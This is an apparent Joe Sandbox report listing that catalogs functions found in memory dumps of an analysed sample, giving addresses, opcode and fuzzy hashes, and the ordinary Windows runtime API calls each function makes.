API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 62ad58e88787a4e6f444909029be458787397f375208eab73b05c38969dc7319
Instruction ID: 783494d485d349ff65ff9d933f7127fb03fb379caf9530cf89c3a7eebd3e9ab5
Opcode Fuzzy Hash: 62ad58e88787a4e6f444909029be458787397f375208eab73b05c38969dc7319
Instruction Fuzzy Hash: C7B15A77600B888BEB56CF29C88239877A0F349B9CF16C915EA5D87BA4CF35C495C704

Function 00007FFE1A52BDB4 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE1A52C003
RaiseException.KERNEL32 ref: 00007FFE1A52C014

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 4bab94b556bb9032a53ba4931a43399a95ceff4681772885227a6c4f56b91691
Instruction ID: b3e48f60a8ac24eb1426eaf0fc26b420d4a0a6ef6d53101a05569c5fe4ec44ec
Opcode Fuzzy Hash: 4bab94b556bb9032a53ba4931a43399a95ceff4681772885227a6c4f56b91691
Instruction Fuzzy Hash: FFB13673608B88CAEB158F6AC48636C3BA1F785F58F1589A2DB5D877B4CB39D451C700

Function 00007FFE1A521FDC Relevance: 1.9, APIs: 1, Instructions: 373COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 00007FFE1A522124

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 0fc56d8d5da61b13af40bebcbdc92a7e0201612aca8d89ff143ba20f779d0eca
Instruction ID: adfabdeb06b080a8365cda69c735c244bd7a3744411a217b0a4e1ae39fb88c77
Opcode Fuzzy Hash: 0fc56d8d5da61b13af40bebcbdc92a7e0201612aca8d89ff143ba20f779d0eca
Instruction Fuzzy Hash: 4512AD22A0CBC1C6E751CF6994542FD73A5FB69B98F4592B6EF8D46662DF38E180C300

Function 0000000180045A68 Relevance: 1.9, APIs: 1, Instructions: 371COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32 ref: 0000000180045BB0

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 9af5b6f6d2e245b86d089921854158c382643bcadff1ce5a87e3c4c11e098f8a
Instruction ID: fc49695453d8ef2480cea9a42b20bdc738b515091dbbab01cacd8a632f87fc29
Opcode Fuzzy Hash: 9af5b6f6d2e245b86d089921854158c382643bcadff1ce5a87e3c4c11e098f8a
Instruction Fuzzy Hash: 36128032A08BC886E792CF2894857ED73A4F75D788F06D215EF9847692EF35D289C704

Function 00007FFE1A52CA60 Relevance: 1.8, APIs: 1, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273baeb646477fd2bed3fd18ca15ae6fda8a48472058ce216ab5dd3170b8011f
Instruction ID: cd76edc613fdda9ec665ca89a45cb43d6be2df5334b8074ae6a8e6f83d670f19
Opcode Fuzzy Hash: 273baeb646477fd2bed3fd18ca15ae6fda8a48472058ce216ab5dd3170b8011f
Instruction Fuzzy Hash: B9E12E22B08F4186E721DAA2E4402FE77A5FB55B98F414577DB8E53B66EF38E245C300

Function 0000000180058F58 Relevance: 1.8, APIs: 1, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ed44ace4091d480f3ef355d863bdf74fab578956d5a554332e11a09d400dad
Instruction ID: 51f01afaddc143b8a46062c6d139b62345cdbf0be41886248f48aa45e0917dee
Opcode Fuzzy Hash: e5ed44ace4091d480f3ef355d863bdf74fab578956d5a554332e11a09d400dad
Instruction Fuzzy Hash: 64E1AF32605B8486E7A1CBA1E4417EE37A4F7987C8F418625AF9D67796EF39C348C700

Function 000000018005C044 Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 000000018005C0A8

Part of subcall function 000000018005ED7C: _invalid_parameter_noinfo.LIBCMT ref: 000000018005ED90

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo
String ID:
API String ID: 474895018-0
Opcode ID: 694b8f7a42609e1eeddccacf59ccf2252a291a3aa8f188aee69ec506436f4cfa
Instruction ID: aa53236cb1f570c342f75dc33648d00a4766411757460dfe0bf9d75ff7b85de4
Opcode Fuzzy Hash: 694b8f7a42609e1eeddccacf59ccf2252a291a3aa8f188aee69ec506436f4cfa
Instruction Fuzzy Hash: 82713F327005884EF7F64E698480BED62D1B74D3E0F14C629FA55A76D1DE7BCB498702

Function 00007FFE1A528EDC Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3a910e0c8329898dc969ff7ef890d10b3fbbfe9d95aed6c3839b5780950b1a
Instruction ID: 6f668612e242f70d2881557ae511492646e8dc77ea1fc80b51b2ebca4837959c
Opcode Fuzzy Hash: 3b3a910e0c8329898dc969ff7ef890d10b3fbbfe9d95aed6c3839b5780950b1a
Instruction Fuzzy Hash: 7251A622B0CA81D5F7109BB3A8445BA7BA6BB46BE4F1441B7EE5C67BA5DE3CD401C700

Function 0000000180055750 Relevance: 1.6, APIs: 1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be70738b09141c11d8332b6580b4aa7a80602b018d16bc3d079eb69f02c70a0c
Instruction ID: d1c75bd11e320f000607e65b2c2a834299a0088d85d911db9c9a53249613f2ae
Opcode Fuzzy Hash: be70738b09141c11d8332b6580b4aa7a80602b018d16bc3d079eb69f02c70a0c
Instruction Fuzzy Hash: 1351F332704B9488F7A19B72A9503DE7BA1B748BE4F148215BE9867F89CF39C209C700

Function 000000018002C080 Relevance: 1.6, Strings: 1, Instructions: 382COMMON

Download Yara Rule

Strings

1.3.1, xrefs: 000000018002C667

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID: 1.3.1
API String ID: 0-1719332089
Opcode ID: d3b04e07ca4fdc738dc7d5e25c4cff0942e787a5a40c10432fc94df9780b0cb2
Instruction ID: f5de7b345664f4f123ecc9f21b69ea885d3174b5ff17d43c596dd602c8417bff
Opcode Fuzzy Hash: d3b04e07ca4fdc738dc7d5e25c4cff0942e787a5a40c10432fc94df9780b0cb2
Instruction Fuzzy Hash: 4BF1D032610A9487E79ACF28D9517ED37A0F38D788F54913AEF8987B85CB38D664C710

Function 000000018005AEA8 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

GetLocaleInfoW.KERNEL32 ref: 000000018005AF10

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 0bce3144c4e56d501d49be3727f953c228f44adfc2f79aa8643d45a0da270f44
Instruction ID: 4776ff8e2d72d2b395f7ae45e53f7f1a03a6588cfade7eec42ec55544c6e1022
Opcode Fuzzy Hash: 0bce3144c4e56d501d49be3727f953c228f44adfc2f79aa8643d45a0da270f44
Instruction Fuzzy Hash: A5318F7260468986FBA68B21E4413DE73A1F78D7C4F40C135BB9993385DF39D6498740

Function 00007FFE1A52E974 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

Part of subcall function 00007FFE1A523544: FlsSetValue.KERNEL32 ref: 00007FFE1A523589

GetLocaleInfoW.KERNEL32 ref: 00007FFE1A52E9DC

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastValue$InfoLocale
String ID:
API String ID: 673564084-0
Opcode ID: 0844acf31803b16347de819f89b6f068f59457d28696e34513b591ef7e5c2783
Instruction ID: db42dfd180d4725523fedf9998ae8d946d82aa3b573f0f26f0a98a3b0466bd78
Opcode Fuzzy Hash: 0844acf31803b16347de819f89b6f068f59457d28696e34513b591ef7e5c2783
Instruction Fuzzy Hash: 6A319571B0CA82C2EB24CB62E4453BA7792FB5AB94F4481B7DA5D83666DF3CE4048700

Function 000000018005AAF4 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

EnumSystemLocalesW.KERNEL32(?,?,?,000000018005B2DF,?,00000000,00000092,?,?,00000000,?,000000018004CE4D), ref: 000000018005AB92

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: fa7d24e3a50340eb16b3325cf82cec3404d0ffebb49fa2fdd59b631cfb3b9d4b
Instruction ID: a7bec005cd89360fb72efbf8fb7cddc326c8c4130be910c9068c09eadfdd9d4a
Opcode Fuzzy Hash: fa7d24e3a50340eb16b3325cf82cec3404d0ffebb49fa2fdd59b631cfb3b9d4b
Instruction Fuzzy Hash: BD11C073A086488AFB968F25D0407D87BA1E399BE4F448115E665533C1DB75C6D9C780

Function 00007FFE1A52EB7C Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

GetLocaleInfoW.KERNEL32(?,?,?,00007FFE1A52E926), ref: 00007FFE1A52EBB3

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$InfoLocaleValue
String ID:
API String ID: 3796814847-0
Opcode ID: 4f7d52460449a944302abd5f6eb93352bf44f80563c27f8ef66fbf64c2618ea7
Instruction ID: c070cbdb40682342c2887be55a7e03e9c17dd37ef21965d12b10521eec45a2dc
Opcode Fuzzy Hash: 4f7d52460449a944302abd5f6eb93352bf44f80563c27f8ef66fbf64c2618ea7
Instruction Fuzzy Hash: 27117A72B0C952C3E77887A7A44067A6663EF81F74F1442B3EE2E176D6DE29D8809700

Function 000000018005B0B0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

GetLocaleInfoW.KERNEL32(?,?,?,000000018005AE59), ref: 000000018005B0E7

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c80ccf82426152413520279d34601ead126928e1ef540f58e708ce24cdebed15
Instruction ID: 9f7279421396565afe5315a1457c5bb3811afe4134837e1095c9f19e6ffd44fe
Opcode Fuzzy Hash: c80ccf82426152413520279d34601ead126928e1ef540f58e708ce24cdebed15
Instruction Fuzzy Hash: DF118C32714A5C82EBE55F22E0207FA23A1F3487E4F908221FB36976C4CE36DAC58344

Function 000000018005ABC4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 000000018004B450: GetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B45F
Part of subcall function 000000018004B450: SetLastError.KERNEL32(?,?,?,000000018003F5B7,?,?,00000000,00000001800545B4), ref: 000000018004B4FD

EnumSystemLocalesW.KERNEL32(?,?,?,000000018005B29B,?,00000000,00000092,?,?,00000000,?,000000018004CE4D), ref: 000000018005AC42

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5c1676e1f569f5397bf232c0da2374e34a19f537134c26dd26df9920c4758bf0
Instruction ID: ede0fe1f0f27fbf69e399a72ad39baab6145cca1195e95b1c4459c7978fceb20
Opcode Fuzzy Hash: 5c1676e1f569f5397bf232c0da2374e34a19f537134c26dd26df9920c4758bf0
Instruction Fuzzy Hash: 2A01477270828887FB925F25E4407D97AE2E749BE4F45C221F260572C4DF7586C8C700

Function 00007FFE1A52E694 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A523544: GetLastError.KERNEL32 ref: 00007FFE1A523553
Part of subcall function 00007FFE1A523544: FlsGetValue.KERNEL32 ref: 00007FFE1A523568
Part of subcall function 00007FFE1A523544: SetLastError.KERNEL32 ref: 00007FFE1A5235F3

EnumSystemLocalesW.KERNEL32(?,?,?,00007FFE1A52ED6F,?,00000000,00000092,?,?,00000000,?,00007FFE1A5240C1), ref: 00007FFE1A52E712

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystemValue
String ID:
API String ID: 3029459697-0
Opcode ID: 3e1bc51461ede6e204ffc939935f3afb1a0c02a7de8c4f4945154fcba3e79e89
Instruction ID: bd0d2e35687a9bad33c76629070403593abda64f2e76a4c76dcf4dcb74bda2fe
Opcode Fuzzy Hash: 3e1bc51461ede6e204ffc939935f3afb1a0c02a7de8c4f4945154fcba3e79e89
Instruction Fuzzy Hash: 0301D6B2F0C68186E7145F57E4407B97A92EB41FB0F4582B3DA29072E5CE68A4809700

Function 000000018004ED7C Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,000000018004F20D,?,?,?,?,?,?,?,?,00000000,000000018005A140), ref: 000000018004EDCB

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 450f168e484fb4c486b4918e0caababf0652eb1a9a9293a2ca3be38ea0dd77c4
Instruction ID: 52397f7b1e471569e5c45109f7b09d6e4cee1eb22353800dc9c9fa22612379a3
Opcode Fuzzy Hash: 450f168e484fb4c486b4918e0caababf0652eb1a9a9293a2ca3be38ea0dd77c4
Instruction Fuzzy Hash: 0AF01972200B4886E645DB55F8903D93362FB9DBC4F55C025EA4987365CF38C6A98744

Function 00007FFE1A527CB4 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FFE1A528017,?,?,?,?,?,?,?,?,00000000,00007FFE1A52DC14), ref: 00007FFE1A527D03

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 33bf90e4cff3f36875c65de48b08cf2f48f37e751eccc28b3a1ca46a4bda2798
Instruction ID: 14a8da6d1f419799eb618bb60de85adf4df1bf5890f859d486a204ef6c9fc42b
Opcode Fuzzy Hash: 33bf90e4cff3f36875c65de48b08cf2f48f37e751eccc28b3a1ca46a4bda2798
Instruction Fuzzy Hash: 44F04B75B08B4183E700CB66F8901B92666BB8AB90F1480B6EA0D87375DE3CD4608340

Function 00007FF6B40A8FF0 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32 ref: 00007FF6B40A9018

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 31dccd072e64551f98ab6879ea7bd154d9440411f0b7712922749f385e097360
Instruction ID: ab9f06eef7d78a7885ce827b872c90fbfa1b14d364010892ec9d9e78f4d6f656
Opcode Fuzzy Hash: 31dccd072e64551f98ab6879ea7bd154d9440411f0b7712922749f385e097360
Instruction Fuzzy Hash: 82E06561B0C68185FA709B24E4917AA3760BF98798F800232DB9C866A5DE2CD241CB00

Function 00007FF6B40A3874 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6B40A387F

Memory Dump Source

Source File: 00000006.00000002.4146867541.00007FF6B40A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6B40A0000, based on PE: true

Associated: 00000006.00000002.4146851129.00007FF6B40A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146885168.00007FF6B40AB000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146901761.00007FF6B40AF000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4146915321.00007FF6B40B3000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff6b40a0000_8pIuMUYQX9q.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b981d103fe42b6072a74c3b84e95ed457afdc28bb6a7e0fc0e13f38bf8027899
